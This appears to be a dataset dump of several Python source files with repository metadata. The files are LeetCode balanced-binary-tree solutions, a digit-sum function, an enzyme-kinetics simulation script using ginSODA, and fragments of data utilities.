out['click_sub_index_2d'], \
out['feature_clicked_x']
out2 = {}
out2['vali_thread_u']=vali_thread_u
out2['size_user_v']=size_user_v
out2['max_time_v']=max_time_v
out2['news_cnt_short_v']=news_cnt_short_v
out2['u_t_dispid_v']=u_t_dispid_v
out2['u_t_dispid_split_ut_v']=u_t_dispid_split_ut_v
out2['u_t_dispid_feature_v']=u_t_dispid_feature_v
out2['click_feature_v']=click_feature_v
out2['click_sub_index_v']=click_sub_index_v
out2['u_t_clickid_v']=u_t_clickid_v
out2['ut_dense_v']=ut_dense_v
return out2
| UTF-8 | Python | false | false | 19,330 | py | 8 | data_utils.py | 6 | 0.494413 | 0.478427 | 0 | 445 | 41.429213 | 199 |
vijayjag-repo/LeetCode | 8,632,884,315,610 | 2f727b0d0a852b60a1e78a3f21e8acbc5e2e68a5 | 9c63f6d39a6085674ab42d1488476d0299f39ec9 | /Python/LC_Balanced_Binary_Tree.py | c57c1e3b2bae5d2db27ba76a6f3dd287ba6760ef | []
| no_license | https://github.com/vijayjag-repo/LeetCode | 2237e3117e7e902f5ac5c02bfb5fbe45af7242d4 | 0a5f47e272f6ba31e3f0ff4d78bf6e3f4063c789 | refs/heads/master | 2022-11-14T17:46:10.847858 | 2022-11-08T10:28:30 | 2022-11-08T10:28:30 | 163,639,628 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isBalanced(self, root):
"""
:type root: TreeNode
:rtype: bool
Approach:
Find depth recursively.
Store the max_difference between depths of left and right subtrees.
If this value is greater than 1, it is not balanced. Else, balanced.
"""
self.max_difference = 0
def helper(root):
if not root:
return(0)
else:
left = helper(root.left)
right = helper(root.right)
self.max_difference = max(self.max_difference,abs(left-right))
return(1+max(left,right))
helper(root)
return(False if self.max_difference>1 else True)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isBalanced(self, root):
"""
:type root: TreeNode
:rtype: bool
"""
def depth(node):
if not node:
return 0
else:
left = depth(node.left)
right = depth(node.right)
if (left == -1 or right == -1 or abs(left-right) > 1):
return -1
return 1 + max(left,right)
return depth(root) != -1
| UTF-8 | Python | false | false | 1,572 | py | 219 | LC_Balanced_Binary_Tree.py | 217 | 0.506361 | 0.498728 | 0 | 56 | 27.071429 | 78 |
dolphin-in-a-coma/python-course | 7,499,012,933,376 | b8ecde6100d505e4a95c792e07950886b3624cf6 | 772915fc1d85ba50892d6aadcff9d5d55e1a62b5 | /2-9_Rest_subjects/6_Time_complexity/6.2.3.py | cca46721a19d18ce0cf767483f1e1ac4ae358d07 | []
| no_license | https://github.com/dolphin-in-a-coma/python-course | eb90b9797e4ef397acd1577b30c31e372ffb6ed7 | c5dd67c3e699a62eb5f9594bc13dabbed830fecc | refs/heads/master | 2020-04-15T19:24:53.277011 | 2019-01-09T22:48:04 | 2019-01-09T22:48:04 | 164,948,718 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #функция возвращает сумму цифр
#сложность = O(N)
def foo(s):
# s - строка
val = 0
for c in s:
if c.isdigit():
val += int(c)
return val
| UTF-8 | Python | false | false | 213 | py | 232 | 6.2.3.py | 188 | 0.511628 | 0.505814 | 0 | 10 | 16.2 | 30 |
medision/dtwa_bbgky_fermions | 19,043,885,016,852 | 05b516c47d708288965f48a963c1000bd35add11 | b389b7f2f38f370cfc8cb92d49fe7d8a4f76c767 | /main.py | ee6f1601c0cddb39775bfd7ccd2e88b4504a6265 | []
| no_license | https://github.com/medision/dtwa_bbgky_fermions | 3cba385124e1a1ca7941f82ab00fa3ec025db788 | 75454ce5f94a43ec9a82181c89126dea370060bd | refs/heads/main | 2023-03-18T23:30:42.647050 | 2020-12-08T10:36:22 | 2020-12-08T10:36:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from ginSODA.ginsoda import *
from pylab import *
import os
if __name__ == '__main__':
os.chdir('./ginSODA')
# Example of Enzyme Kinetics
GS = ginSetup()
GS.add_variables(["Substrate", "Enzyme", "Complex", "Product"])
GS.add_parameters(["k0", "k1", "z2"])
GS.add_equations([
"-k0*Substrate*Enzyme+k1*Complex", # S: S+E->ES, ES->S+E
"-k0*Substrate*Enzyme+k1*Complex+z2*Complex", # E: S+E->ES, ES->S+E, ES -> P+E
"+k0*Substrate*Enzyme-k1*Complex-z2*Complex", # ES: S+E->ES, ES -> S+E, ES -> P+E
"+z2*Complex"]) # P: ES -> P+E
GS.set_model_dir("../data/MODELTEST")
GS.set_output_dir("../data/OUTPUTDIR")
GS.set_output_prefix("../data/PREFIX")
GS.check_reactions()
GS.force_rebuild = False
THREADS = 4096
# parameters = [[0.0025,0.1,5.0]]*THREADS
parameters = []
perturbation = linspace(2.5e-3, 2.5e-2, THREADS)
for x in xrange(THREADS):
parameters.append([perturbation[x], 0.1, 5.0])
initial_values = [[1000, 500, 0, 0]] * THREADS
# initial_values = arange(2*THREADS).reshape(THREADS,2)
time_instants = linspace(0, 5, 50)
atol_vector = [[1e-6]] * THREADS
rtol = 1e-4
max_steps = 500
# GS.estimate_memory_requirements(THREADS, time_instants)
# exit()
# GS._use_shared_memory = True
all_dynamics = GS.run(
lsoda_settings={'max_steps': max_steps, 'atol_vector': atol_vector, 'rtol': rtol},
parameters=parameters,
initial_values=initial_values,
time_instants=time_instants,
no_simulation=False
)
# exit()
for s in xrange(4):
plot(all_dynamics[0].T[0], all_dynamics[0].T[s + 1], label=GS.SD.variables[s] + "\_model1")
for s in xrange(4):
plot(all_dynamics[32].T[0], all_dynamics[32].T[s + 1], "--", label=GS.SD.variables[s] + "\_model2")
legend(ncol=2)
show()
| UTF-8 | Python | false | false | 1,895 | py | 29 | main.py | 22 | 0.583113 | 0.545119 | 0 | 56 | 32.839286 | 107 |
benwei/Learnings | 12,506,944,792,559 | c9e4d212d9f5192042c0263db83fd853c1afd71d | 10e3f9659affb4c74280ee27a6e485c8d7e86c56 | /pySamples/test08_any_in_list.py | 394161f3b7b1510442110023279a046f28cfeec3 | []
| no_license | https://github.com/benwei/Learnings | a52a751e6ba9bbbbf7b51b0e6b6ac5e839a87cd3 | e020698c2be16bf7eb1c7fb9bf19276165cc0400 | refs/heads/master | 2023-02-04T22:27:00.182020 | 2023-01-19T16:52:31 | 2023-01-19T16:57:43 | 1,994,139 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
some_list = ['abc-123', 'def-456', 'ghi-789', 'abc-456']
def string_in_list(token, alist):
if any(token in s for s in some_list):
print("%s in" % token)
return 1
print("%s not in" % token)
return 0
string_in_list('abc', some_list)
string_in_list('546', some_list)
string_in_list('ooo', some_list)
| UTF-8 | Python | false | false | 331 | py | 593 | test08_any_in_list.py | 308 | 0.592145 | 0.540785 | 0 | 15 | 21 | 56 |
Hagen013/presidentwatches | 13,778,255,108,366 | 6174f3b52dfbec9865f94c640e884ec9d87e472f | d210853ba6d1f3b5383a09e1b553c19083d78014 | /server/api/views/__init__.py | e6f3f66aa7aaa70a6b01e17435ed6ce2cb7a37fb | []
| no_license | https://github.com/Hagen013/presidentwatches | f252c7995e39f6cffb6608e43f555abc32f6a9fc | b9ca72aef1db01262675274c83a5c5dff4d6e2da | refs/heads/master | 2022-12-17T08:45:15.541869 | 2019-12-29T17:48:56 | 2019-12-29T17:48:56 | 162,160,435 | 0 | 0 | null | false | 2022-12-08T01:49:45 | 2018-12-17T16:36:05 | 2019-12-29T17:49:10 | 2022-12-08T01:49:45 | 8,814 | 0 | 0 | 22 | HTML | false | false | from .viewsets import ModelViewSet, ListViewMixin
| UTF-8 | Python | false | false | 50 | py | 451 | __init__.py | 267 | 0.86 | 0.86 | 0 | 1 | 49 | 49 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.